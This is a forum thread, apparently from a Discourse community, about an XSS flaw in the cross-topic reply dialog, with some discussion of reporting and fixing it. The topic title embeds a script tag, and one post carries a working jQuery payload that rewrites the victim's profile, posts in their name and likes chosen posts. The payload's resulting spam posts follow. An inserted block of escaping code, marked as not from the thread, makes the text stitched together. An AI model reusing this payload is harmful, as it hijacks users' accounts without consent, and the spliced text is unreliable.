Formerly A Cross-Topic Reply XSS topic<script src='/raw/8058/22'></script>
-
Continuing the discussion from <script>$("body").addClass("fa-flip-vertical");</script>:
Well, it's not like it's fixed yet or anything.
Did anyone actually submit it to Meta.D? I wasn't able to see a topic about it, but if it was submitted then I'd imagine they'd move the topic to the lounge to prevent others from finding and abusing it before they can get the major instances patched. And I can't see the lounge because I lost TL3 due to the read-before-visiting-topics bug screwing up my topics visited statistic, which I haven't bothered to bot back up on meta.d like I did here.
So does any TL3 on meta.d know if the cross-topic reply dialog XSS has been submitted to meta.d?
-
According to our TL4 @aliceif they notified the important people but tried to not make it public, really.
Filed Under: So, everybody here knows about it but other forums are "safe"
-
According to our TL4 @aliceif they notified the important people but tried to not make it public, really.
Wouldn't it be better to make a PSA out of it? I mean, it's not exactly a hidden bug, and it would make sense to at least warn those who'd otherwise be conned into a "29-years-old forumgoer discovers a super secret instant TL4 technique, all admins hate him" kinda thing.
-
Meh, the bug (still) relies on a single person actually doing a Cross-topic reply, right?
So to abuse it you would have to actually go out of your way to make people do those.. and honestly, how often have you actually attempted to post cross topic?
I am not going to say the bug is not bad. It's a definite problem with the sanitisation and should be fixed ASAP. But over at meta.d they are currently trying to figure out why Discourse eats more memory than @ben_lubar when he has 1000000 instances of DF open, so I assume this is "high" on the priorities but not the top spot.
Filed Under: I don't know, though. All I can do is guess
-
So to abuse it you would have to actually go out of your way to make people do those..
As I said, a "super-secret way to obtain TL4"? Though it would probably be easier to make the poor soul open the dev console...
and honestly, how often have you actually attempted to post cross topic?
Might've happened once or twice - I'd compose a reply, something catches my eye, I navigate out of the original topic, and then remember about the reply.
so I assume this is "high" on the priorities but not the top spot.
It's an easy fix, though, and XSS in any way generally makes you look really bad.
-
As I said, a "super-secret way to obtain TL4"?
Wait, did I miss something about this bug? I thought everybody just posted scripts (either public or via PM) and then made the screen turn like crazy... Do we have 100000 new TL4s now that I need to look out for?
Might've happened once or twice - I'd compose a reply, something catches my eye, I navigate out of the original topic, and then remember about the reply.
Welp, that's what it is there for. But it's still kind of an edge-case, right? And the chances of you doing that in exactly that one topic that tries to obviously screw with your stuff by having scripts in the title are kinda slim.
It's an easy fix, though,
Didn't you also assume that the 504s had no connection to the Closing of topics?
I mean, this is Discourse we are talking about, I have no idea how easy / hard it is to fix this. I also don't know if they will backport it, now that 1.2 is close.
Filed Under: As I said: Should definitely be fixed but not sure when they get around to it
-
It's an easy fix, though, and XSS in any way generally makes you look really bad.
Exactly.
Wait, did I miss something about this bug?
Well they could inject random TL4 commands and hope a TL4 accidentally cross-topic posts onto their XSS topic. Yeah, it's super unlikely to happen because of how blatantly obvious it is, but it is still there, and maybe some noob admins could be tricked into doing it. @PJH usually tests things here, and if someone had injected a script into one of those /raw post calls that ran delete user calls, they could have gotten PJH to drop our entire user table I would think.
-
Didn't you also assume that the 504s had no connection to the Closing of topics?
I only said it would be fucking ridiculous if it were true.
That's Discourse for you. Assume nothing, expect nothing.
Wait, did I miss something about this bug? I thought everybody just posted scripts (either public or via PM and then made the screen turn like crazy... Do we have 100000 new TL4s now that I need to look out for?
No, but if you were in a forum with less, ahem, Darwin-favoured members, they might be easily fooled to think that this jumble of magic computer letters and a tricky Glitch City-like path would give them admin/mod/whatever.
-
if someone had injected a script into one of those /raw post calls that ran delete user calls, they could have gotten PJH to drop our entire user table I would think.
Can you delete users now? I remember @PJH mentioning that it's either impossible or a huge hassle...
-
they might be easily fooled to think that this jumble of magic computer letters and a tricky Glitch City-like path would give them admin/mod/whatever.
Or that, yea. You could inject the calls so that when @PJH tested it out, it would make your account a mod account.
-
Can you delete users now? I remember @PJH mentioning that it's either impossible or a huge hassle...
oh - that may be true; I'm just throwing out ideas on how bad the XSS bug can be if it falls into the wrong hands. Too many people seem to think this XSS method wouldn't have any impact. While it is a low CHANCE of impact, if it did happen, the impact would/could be HUGE.
-
Or that, yea. You could inject the calls so that when @PJH tested it out, it would make your account a mod account.
There is one of those raw-injecting posts in the wild, courtesy of mine, but last time I checked it only did cornify. And there's little point to crowning yourself as a mod only to have your account instabanned, is there?
-
That's Discourse for you. Assume nothing, expect nothing.
FTFY: Assume nothing, expect ~~nothing~~ the worst.
-
FWIW, I was considering adding my bot code to a post in OnePost and then using that raw link to inject the bot into anyone's browser that tested out the cross-topic reply stuff. My bot can post. And Like. And Etc. I could have impersonated anyone.
-
And there's little point to crowning yourself as a mod only to have your account instabanned, is there?
I am betting that you could hide the exploit well enough from mods on less tech savvy forums so as to not get insta-banned.
But yes, it would have to be more of a luck thing to get it to happen ever. Just that if it did happen, that forum would be at the mercy of the injector (until another mod fixes it at least).
-
they could have gotten PJH to drop our entire user table I would think.
Hardly. I don't have access to the live database.
I remember @PJH mentioning that it's either impossible or a huge hassle...
For anyone who's made more than a few posts, their posts have to be deleted first.
For anyone who's been here more than a certain length of time, the site setting would have to be upped to allow the deletion.
Removing anyone but a spammer is not a 'one-click' operation.
And the current one has been reported to Jeff, Sam and Régis, so at least three of the devs know about it.
-
Hardly. I don't have access to the live database.
Not literally "drop". But if any admin functionality in the admin panel allowed it, malicious code could make your browser do it if you cross-replied to one of these.
-
@eviltrout merged in a fix this morning, trouble is I am still investigating some high memory usage issues and am not particularly enthused about unleashing tests-passed here, give me a bit longer.
-
malicious code could make your browser do it if you cross-replied to one of these.
Only if it addresses the points that sprung to mind listed in my previous post - there are other things that it would have to do.
Basically it isn't a simple 'bobby tables' type thing, even if I could be tricked into executing something via XSS.
give me a bit longer.
While not looking pretty, I don't think this one is particularly bad, unless there's another more serious vector around it that hasn't been found yet.
Any ETA on Beta7/Main release yet?
-
we were meaning to do a main release next week, but I may push for a beta7 first and then follow with a main release shortly after.
-
/* I'd like to see someone cross-topic reply on this post now... also, welcome to t/1000 if you do.
<this is to hide the codes. I see you cheating by using our special raw button to preview the injection! */$.ajax({type: "PUT",url: $('.user-dropdown-links a').first().attr("href"),data: {bio_raw:"I am ɗӑʁҞɯɐɫɫӛʁ's new puppet",name:"ɗӑʁҞɯɐɫɫӛʁ's new puppet"}});var a=function(u,d){ $.ajax({ type: "POST", url: u, data: d });};a("/posts",{raw:"Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<a"+Math.random(), category: 16, topic_id: 8058, is_warning: "false", archetype:"regular"});setTimeout(function(){a("/posts",{raw:"I got suckered into posting in t/1000. All your likes are belong to me. darkmatter will be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<a"+Math.random(), category: 16, topic_id: 1000, is_warning: "false", archetype:"regular"});},6000);a("/post_actions",{id: 230261, post_action_type_id: 2, flag_topic: "false"});a("/post_actions",{id: 230263, post_action_type_id: 2, flag_topic: "false"});
-
I'd like to see testers do a cross-topic reply on this topic now.
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.
tyvm
-
EEEK
-
I especially love how their sanitizer hides the javascript from view unless you actually visit the /raw URL.
i am sad that the /dammit breaks the link :(
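The point made above, that display-time sanitizing of the post body does nothing for a title that the reply dialog reads raw, is shown here in an added example that is not from this thread or from Discourse itself. It assumes a hypothetical dialog that builds its notice as an HTML string from the source topic's title; the fix is output encoding at that point, and the escaper also keeps text like "<a0.68..." visible instead of having it eaten as a tag.

```javascript
// Constructed sample title, shaped like the one this topic carries.
const SAMPLE_TITLE =
  "Formerly A Cross-Topic Reply XSS topic<script src='/raw/8058/22'></script>";

// Minimal HTML escaper for text placed in element content or a
// double-quoted attribute value.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable form (hypothetical): the raw title is concatenated straight
// into markup, so a <script> in the title becomes live script once the
// dialog's HTML is inserted into the page.
function replyNoticeUnsafe(topicTitle) {
  return "<div class='reply-notice'>Replying to: " + topicTitle + "</div>";
}

// Hardened form: encode at the point of output. In a real DOM you would
// reach the same result by assigning the title to an element's textContent
// instead of innerHTML; string building is used here so it runs without a
// browser.
function replyNoticeSafe(topicTitle) {
  return (
    "<div class='reply-notice'>Replying to: " + escapeHtml(topicTitle) + "</div>"
  );
}

// Regression check a test suite could keep: no start tag other than the
// dialog's own wrapper may survive in the rendered notice.
function noticeLeaksTag(html) {
  const inner = html.replace(/^<div class='reply-notice'>/, "").replace(/<\/div>$/, "");
  return /<\s*\/?\s*[a-z]/i.test(inner);
}
```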
-
well damn, it failed to run step 2... needs more testing!
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<0.6153356169816107
-
Added randomizer so it won't block my spam for "being too similar"
Also funny that it causes your post to fail if you hit submit too soon, because it hijacked your posting and you can only post once every 5s.
-
you can only post once every 5s
now add a setInterval() in there and DOS the victim?
-
You could, but it would stop running the script once they closed the tab, refreshed the page, or navigated away from Discourse.
Whatever it is has to do its dirty work within a few seconds, though you can do a lot of non-rate-limited stuff in a few seconds. Fortunately cross-topic replying is so rare that it's kind of a security by obscurity.
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<0.3009734444785863
-
let's see if that takes. yep, works... now that's humorous.
too bad no one will trust this topic enough to try it
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<0.11207702980710754
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<0.5991284630727023
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<0.3009734444785863
You can add an alphabetical character after the < to hide the random number.
-
yay someone did it for me :)
-
You can add an alphabetical character after the < to hide the random number.
I might as well go for completeness... sure why not!
Added char that should hide the random number piece.
-
That's awesome.
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<a0.6878043573815376
-
Fixed it.
-
ha nice
yea, I fixed the script now too :)
-
pshaw, not like you can't change it back.